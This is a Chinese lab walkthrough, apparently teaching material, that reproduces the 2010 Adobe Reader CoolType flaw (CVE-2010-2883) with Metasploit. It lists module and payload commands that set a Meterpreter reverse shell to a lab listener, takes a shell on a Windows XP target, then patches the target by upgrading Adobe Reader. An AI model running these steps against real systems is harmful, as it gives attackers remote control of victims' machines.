CVE-2010-2883-PDF漏洞提权复现过程

第二步,打开Kali Linux渗透机使用命令msfconsole进入Metasploit渗透测试平台,使用模块adobe_cooltype_sing生成木马文件。

输入search adobe_cooltype_sing命令搜索Adobe渗透模块

CVE-2010-2883-PDF漏洞提权复现过程_第1张图片

 

与漏洞相关的模块有两个,编号为0的模块是使用本地的服务器挂载木马文件的模块,编号为1的模块是生成木马文件需要用到的模块。

使用use exploit/windows/browser/adobe_cooltype_sing命令调用渗透模块,并查看模块的详情

CVE-2010-2883-PDF漏洞提权复现过程_第2张图片

 

使用set SRVHOST 172.16.1.100命令,设置渗透机监听的Apache服务地址

 

使用set payload windows/meterpreter/reverse_tcp命令设置meterpreter载荷

 

使用set LHOST 172.16.1.100命令设置Kali用于监听本地地址

 

使用set LPORT 命令设置本地用于监听的端口

 

使用命令show options查看配置完成的参数

CVE-2010-2883-PDF漏洞提权复现过程_第3张图片

 

最后使用命令exploit执行模块

CVE-2010-2883-PDF漏洞提权复现过程_第4张图片

 

得到一个http://172.16.1.100:8080/RlMOOPnOuIvk的URL地址

第三步,打开靶机Windows XP的IE浏览器,使用浏览器访问上面生成的URL

 

第四步,切换至渗透机中查看效果

CVE-2010-2883-PDF漏洞提权复现过程_第5张图片

 

此时已获得系统最高权限,使用命令session -i查看当前后台活跃的会话。

CVE-2010-2883-PDF漏洞提权复现过程_第6张图片

 

使用命令session -i 1切换到编号为1的会话中,并使用命令shell进入靶机命令终端

CVE-2010-2883-PDF漏洞提权复现过程_第7张图片

 

第五步,回到靶机Windows XP安装最新版的Adobe Reader阅读软件。首先在安装新版本的Adobe Reader软件之前卸载旧版本的软件

 

选择Remove,然后点Next,接下来直接选Next继续,将Adobe Reader卸载掉

CVE-2010-2883-PDF漏洞提权复现过程_第8张图片

 

然后安装新的版本,安装文件(Adobe_Reader_11.exe)位于桌面  

 

勾选上自动安装更新(推荐)(A),然后点安装

CVE-2010-2883-PDF漏洞提权复现过程_第9张图片

安装成功后再次访问URL链接

 

回到渗透机中查看效果

CVE-2010-2883-PDF漏洞提权复现过程_第10张图片

发现木马已经失效,加固成功。

你可能感兴趣的:(中职网络空间安全,linux,运维,服务器,windows,pdf)